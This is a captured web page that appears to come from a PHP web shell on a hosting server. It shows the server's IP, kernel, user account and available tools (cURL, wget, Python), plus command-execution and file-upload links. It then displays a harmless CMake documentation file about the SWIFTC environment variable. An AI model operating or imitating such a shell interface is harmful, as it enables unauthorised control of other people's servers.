|
Server IP : 2a02:4780:3:1493:0:3736:a38e:7 / Your IP : 216.73.216.178 Web Server : LiteSpeed System : Linux sg-nme-web1393.main-hosting.eu 4.18.0-553.84.1.lve.el8.x86_64 #1 SMP Tue Nov 25 18:33:03 UTC 2025 x86_64 User : u926327694 ( 926327694) PHP Version : 7.4.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : ON Directory (0755) : /usr/share/cmake/Help/envvar/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
SWIFTC ------ .. versionadded:: 3.15 .. include:: ENV_VAR.txt Preferred executable for compiling ``Swift`` language files. Will only be used by CMake on the first configuration to determine ``Swift`` compiler, after which the value for ``SWIFTC`` is stored in the cache as :variable:`CMAKE_Swift_COMPILER <CMAKE_<LANG>_COMPILER>`. For any configuration run (including the first), the environment variable will be ignored if the :variable:`CMAKE_Swift_COMPILER <CMAKE_<LANG>_COMPILER>` variable is defined. .. note:: Options that are required to make the compiler work correctly can be included; they can not be changed. .. code-block:: console $ export SWIFTC="custom-compiler --arg1 --arg2"